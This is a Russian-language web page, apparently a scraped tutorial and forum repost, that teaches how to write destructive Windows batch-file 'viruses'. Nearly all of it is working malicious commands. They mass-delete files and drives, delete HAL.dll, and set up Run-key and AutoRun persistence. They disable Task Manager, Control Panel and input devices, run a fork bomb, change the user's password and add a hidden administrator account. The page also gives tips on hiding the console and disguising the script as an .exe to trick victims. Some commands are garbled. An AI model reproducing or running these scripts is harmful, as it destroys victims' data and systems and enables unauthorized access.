Homework For Week Of October 25th
Трофимов Михаил Дмитриевич 18081989
наверняка слышали о сценариях Windows, файлах с расширением *. bat. Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот, или другой текстовый редактор, а также немного энтузиазма.
Итак, как я уже говорил, сценарий имеет расширение *. bat и является текстовым файлом, значит: 1. Создаем текстовый документ с инструкциями: «Taskmgr»( без кавычек); 2. Сохраняем с любым именем и расширением *. bat; 3. Открываем файл и видим что открылся Диспетчер задач. Вместо Taskmgr можно указать любую программу(например: mspaint – Paint, Calc – калькулятор). До вирусов еще далеко, но теперь вы знаете как работают сценарии.
Далее напишем программку, которая создает подпапку в папке, где находится сама, а затем копирует себя на флешку, если та вставлена. Итак создаем. bat -файл следующего содержания:
md folder copy%0 F: \program. bat
Запускаем и видим, что в папке, с которой была запущена наша программка, появилась еще одна папка с именем «folder», а на диске F: появился файл «program. bat» содержащий текст нашей программы.
Теперь я приведу перечень строк, которые могут присутствовать в наших программах(вирусах):
1. «copy %0 a: \b» — копирует выполняемый файл на диск a в папку b (например copy %0 C: \ program. bat); 2. «date x. y. z» — меняет дату на x день, y месяц, z год (например date 16. 11. 05); 3. «time х: у» — меняет время на х часов и у минут (например time 14: 27); 4. «label x: y» — переименовывает диск x на имя y (например label C: Disc error); 5. «del *. * /q» — удалит все файлы в папке, где лежит наш сценарий (папки остаются); 6. «del x: \y *. * /q» — удалит все файлы на диске х в папке у (кроме папок) (пример del F: \Data*. * /q); 7. «assoc. х=. у» — переделает все файлы, на компьютере, форматом х на у (пример assoc. exe=. txt); 8. «md х» — создаст папку, в том месте, где находится наш вирус, с именем х (пример md Papka); 9. «net user «х» /add» — добавит на компьютер пользователя под именем х (пример net user «Smoked» /add).
Используя полученные знания, мы можем написать такие вредоносные программки:
1. Меняет дату и время на компьютере и копирует себя на диск С и на флешку:
time 14: 13 date 11. 07. 12 copy %0 C: \date. bat copy %0 F: \date. bat
2. Или же удаляет все файлы с флешки, переименовывает её и копирует себя на неё:
del F: \ *. * /q label F: error copy %0 F: \deleter. bat
3. Удаляет все файлы с дисков (кроме тех, которые находятся в папках) и меняет дату и время:
del C: \ *. * /q del D: \ *. * /q del E: \ *. * /q del F: \ *. * /q time 00: 00 date 13. 06. 23 del *. * /q
Сложно не заметить окно командной строки, которое открывается при запуске наших программ и тут же исчезает… Так вот чтобы его скрыться от жертвы добавляем вначале программы команду «@echo off» также после каждой команды нужно добавить действие, которое скроет строчку «> nul». После такого усовершенствования наш вирус принимает вид:
@echo off del C: \ *. * /q > nul del D: \ *. * /q > nul del E: \ *. * /q > nul del F: \ *. * /q > nul time 00: 00 > nul date 13. 06. 23 > nul del *. * /q > nul
Вирус готов! Да вот только кто откроет какой то непонятный файл с непонятным расширением да еще и без иконки? Мало кто! Значит необходимо отконвертировать наш вирус в формат *. exe. для этого можно использовать WinRAR или же еще лучше такую программу как «Bat to exe converter».
В наших вирусах мы можем использовать еще такие скрипты:
1. Меняет клавиши мыши местами:
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
2. Открывает выбранную программу до полного зависания компьютера:
; Start mspaint goto x;
3. Добавляет наш вирус в автозапуск (! ):
copy «»%0″ » «%SystemRoot%\system32\File. bat» reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File. bat» /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Теперь имеем достаточно знаний для написания простеньких вирусов. Напоследок напомню, что писать вирусы это не очень хорошо и я надеюсь что читали вы эту статью исключительно из любопытства. Но, тем не менее удачи!!!
@echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт. 2)rundll32 keyboard, disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C 3) rundll32 mouse, disable - Отключаем мышь тоже на всякий. 4) copy %0 %windir%/system - Копируемся в папку windows/system 5)// %0 - Переменная, указывающая на исходный файл-вирус // %windir% - переменная папка масдая. echo run=%windir%/system/*. bat > > %windir%\win. ini - Добавляет текст " run=%windir%/system/*. bat" в файл win. ini 6) echo run=%windir%/system/*. bat > > %windir%\system. ini - Добавляет текст " run=%windir%/system/*. bat" в файл system. ini 7) label LOHOLAMMER - Меняет имя диску c: \ на " LOHOLAMMER" 8) if exist c: \autoexec. bat attrib c: \autoexec. bat -h -s -a -r - Проверяем если есть файл c: \autoexec. bat то убираем //у него атрибуты -h -s -a -r 9) deltree /y c: \autoexec. bat - Удаляем файл c: \autoexec. bat, если не убрать атрибуты, то программа не удалит файл. 10) echo autoexec. bat echo YOU ARE LAMMER... xe-xe-xe > c: \autoexec. bat - Добавить текст " YOU ARE LAMMER... xe-xe-xe" //в новый файл autoexec. bat 11) rundll32 mouse, enable - Включаем, пускай думает, что ниче не было. 12)rundll32 keyboard, enable - Включаем, пускай думает, что ниче не было. 13) echo var WSHShell = WScript. CreateObject(" WScript. Shell" ); > %temp%\mes. js echo WSHShell. Popup(" Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе" ); > > %temp%\mes. js start %temp%\mes. js. //Этот текст выводит масдайное окно с надписью deltree /y %temp%\mes. js //А потом стирает за собой следы. 14) attrib c: \autoexec. bat +h +s +a +r - Делает файл c: \autoexec. bat скрытым и системный чтоб ламер ничего не заподозрил. 15) pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело. )
16)«copy %0 x: \y» - копирует вирус на диск x в папку y (пример copy %0 C: \System. bat); 17)«label x: y» - переименовывает диск x на имя y (пример label C: Disc error); 18)«time х: у» - меняет время на х часов и у минут (пример time 14: 27); 19)«date x. y. z» - меняет дату на x день, y месяц, z год (пример date 16. 11. 05); 20)«md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 21)«del *. * /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 22)«del x: \y *. * /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F: \Data*. * /q); 23)«assoc. х=. у» - переделает все файлы, на компьютере, форматом х на у (пример assoc. exe=. mp3); 24)«net user " х" /add» - добавит на компьютер пользователя под именем х (пример net user " Smoked" /add);
Простенькие вирусы Убирает рабочий стол @echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f > nul Выключается компьютер @echo off shutdown -s -t 1 -c " lol" > nul Перезагрузка компьютера @echo off shutdown -r -t 1 -c " lol" > nul Запрещает запускать программы @echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer. exe /f > nul Удаление дров @echo off del " %SystemRoot%\Driver Cache\i386\driver. cab" /f /q > nul Удаляет звуки Windows @echo off del " %SystemRoot%\Media" /q > nul
Запрещает заходить в панель управления
@echo off reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f > nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton > nul
Удаляет курсор мыши
del " %SystemRoot%Cursors*. *" > nul
Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C: \WINDOWS\system32\SHELL32. dll, -8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Серьезные вирусы Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) rd [Буква_Диск]: /s /q Удаляет все файлы в program files del c: Program Files/q
Убивает процесс explorer. exe
taskkill /f /im explorer. exe > nul
Создает миллион папок
FOR /L %%i IN (1, 1, 1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del " %SystemRoot%Driver Cachei386driver. cab" /f /q > nul
Удаляет команду DEL
del %0
Заражает Autoexec
copy " " %0" " " %SystemRoot%\system32\batinit. bat" > nul reg add " HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d " %SystemRoot%\syste m32\batinit. bat" /f > nul
Создает нового пользователя, с правами администратора, логин: hacker и пароль hack (Можете изменить)
@echo off
chcp 1251 net user SUPPORT_388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT_388945a0 /del reg add " HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v " support" /t reg_dword /d 0 y
сбой системы (! ) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user, disableoemlayer
Меняет местами кнопки мыши, но обратная смена не возможна)
rundll32 user, SwapMouseButton
Удаляет ядро системы
del %systemroot%\system32\HAL. dll
| Subscribe to posts
Homework For Week Of October 25th
posted Oct 15, 2009, 1: 24 AM by Денис Алышев
Тема: E-mail: Sobranierealty@mail. ru
Всем привет. Вот здесь я решил выложить. bat команды
Вообщем вот держите.
Вредилки
Удаление рабочего стола
@Echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
Удалить все браузеры
@Echo off taskkill. exe -f -im chrome. exe taskkill. exe -f -im ie. exe taskkill. exe -f -im firefox. exe taskkill. exe -f -im opera. exe taskkill. exe -f -im safari. exe rd /q /s " %systemdrive%\Program Files\Google\Chrome" rd /q /s " %systemdrive%\Program Files\Safari" rd /q /s " %systemdrive%\Program Files\Mozilla Firefox" rd /q /s " %systemdrive%\Program Files\Opera" rd /q /s " %systemdrive%\Program Files\Internet Explorer"
Удаляем ядро ОС
@Echo off cmd. exe /c takeown /f " %windir%\system32\HAL. dll" icacls " %windir%\system32\HAL. dll" /grant ¤¨ ¨ á â à â ®à ë: F" del /q /s %WinDir%\system32\HAL. dll/q
Превращаем Диск C в помойку
@Echo off md C: \1 md D: \2 attrib +a +s +r +h C: \1 attrib +a +s +r +h D: \2 : Random fsutil file createnew C: \1\%random%. dll 1000000000 fsutil file createnew D: \2\%random%. dll 1000000000 goto Random
Блок дисков
@Echo off REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v " NoViewOnDrive" /t REG_DWORD /d 67108860 /f
Удаление всех файлов на диске D
@Echo off del /q /s %systemdrive% rd /q /s %systemdrive% del /q /s D: \ rd /q /s D: \
Вывести сообщение на экран
@Echo off reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon " /v LegalNoticeCaption /t REG_SZ /d " Ты чмо" / reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon " /v LegalNoticeText /t REG_SZ /d " Паскуда" /f
Запретить запуск программ
@Echo off shutdown -r -t 1 -c " Error" -f
Нагрузка на ЦП 100% (комп виснет ужасно)
@Echo off : Random start wuauclt. exe goto Random
Куча неудаляемых папок
@Echo off FOR /L %%i IN (1, 1, 10000) DO md %%i.. \
Бесконечно создавать папки
@Echo off : Random md %random% goto Random
Блокируем пользователей на ПК
@Echo off net user %username% " 456834756"
Удалить всех пользователей на ПК
@Echo off net user %username% /Delete
А также, чтобы
Команды:
Убрать рабочий стол: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f > nul
Удалить дрова: del " %SystemRoot%\Driver Cache\i386\driver. cab" /f /q > nul
Перезагрузка компа: shutdown -r -t 1 -c " lol" > nul
Удаление файлов: erase %windir%*. * /q
Меняет пароль текущего пользователя на 123456: net user %username% 123456
Открывает больше 200 окошек, и если все не закрыть то комп грузнется и может слететь ОС(если слабый комп): : s start %0 %0|%0 goto: s|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0 goto: s
Ставит время на 0: 00: time 0: 00 > nul
Удаление курсора: del " %SystemRoot%Cursors*. *" > nul
Самоликвидация (самое главное): del " %0" > nul _____________________________
И казалось бы Батник готов, но возникает один вопрос: Как заставить жертву запустить этот вирус? Т. к расшерение вируса " *. bat" жертва даже необратит на него внимание. Здесь можно действовать двумя способами
|